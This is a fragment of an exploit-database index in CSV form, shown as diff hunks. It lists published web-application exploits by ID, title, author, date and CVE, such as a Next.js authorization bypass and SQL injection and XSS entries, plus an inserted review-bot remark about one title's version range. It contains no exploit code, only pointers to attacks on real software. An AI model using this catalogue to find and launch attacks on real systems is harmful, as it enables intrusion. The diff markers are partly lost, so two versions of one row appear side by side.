23924,exploits/multiple/webapps/23924.txt,"Nexpose Security Console - Cross-Site Request Forgery",2013-01-06,"Robert Gilbert",webapps,multiple,,2013-01-06,2013-01-06,1,CVE-2012-6493;OSVDB-88923,,,,,
52124,exploits/multiple/webapps/52124.txt,"Next.js Middleware 15.2.2 - Authorization Bypass",2025-04-05,kOaDT,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2025-29927,,,,,
24967,exploits/multiple/webapps/24967.txt,"Nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",webapps,multiple,,2013-04-19,2013-04-19,1,OSVDB-92634,,,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-04-18-at-24716-pm.png,http://www.exploit-db.comnginx-0.6.36.tar.gz,https://nealpoole.com/blog/2011/08/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/
47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,,2019-08-23,2019-08-23,0,CVE-2019-11013,,,,,
48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,,2020-10-14,2020-10-14,0,,,,,,
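Review bot: row 52124 is titled "Next.js Middleware 15.2.2 - Authorization Bypass", but the exploit file's "# Version:" line lists four affected ranges (13.0.0 - 13.5.8, 14.0.0 - 14.2.24, 15.0.0 - 15.2.2, 11.1.4 - 12.3.4). A reader matching on the title will conclude only 15.2.2 is affected; use a form such as "< 15.2.3" only if the file supports it, or otherwise mention in the title that multiple branches are affected.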
@ -12237,6 +12242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,,
11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@ -14156,7 +14162,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-17,2013-07-26,1,CVE-2006-0310;OSVDB-22526,,,,,https://www.securityfocus.com/bid/16286/info
20866,exploits/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",webapps,php,,2012-08-27,2012-08-27,0,OSVDB-85265;OSVDB-85264,,,,http://www.exploit-db.comaoop_0.3.6_minimal.rar,http://security.inshell.net/advisory/23
12721,exploits/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,webapps,php,,2010-05-23,2011-02-15,1,OSVDB-59001,,,,,
52010,exploits/php/webapps/52010.py,"Apache mod_proxy_cluster - Stored XSS",2024-05-13,"Mohamed Mounir Boudjema",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
52010,exploits/php/webapps/52010.py,"Apache mod_proxy_cluster 1.2.6 - Stored XSS",2024-05-13,"Mohamed Mounir Boudjema",webapps,php,,2024-05-13,2025-04-05,0,CVE-2023-6710,,,,,
12330,exploits/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",webapps,php,,2010-04-20,,1,CVE-2010-0432;OSVDB-64522;OSVDB-64521;OSVDB-64520;OSVDB-64519;OSVDB-64518;OSVDB-64517;OSVDB-64516,,,,,http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php
42520,exploits/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,webapps,php,,2017-08-21,2017-08-21,0,CVE-2017-12971;CVE-2017-12970;CVE-2017-12965,,,,,
5471,exploits/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,webapps,php,,2008-04-18,2016-11-24,1,OSVDB-44533;CVE-2008-1919,,,,,
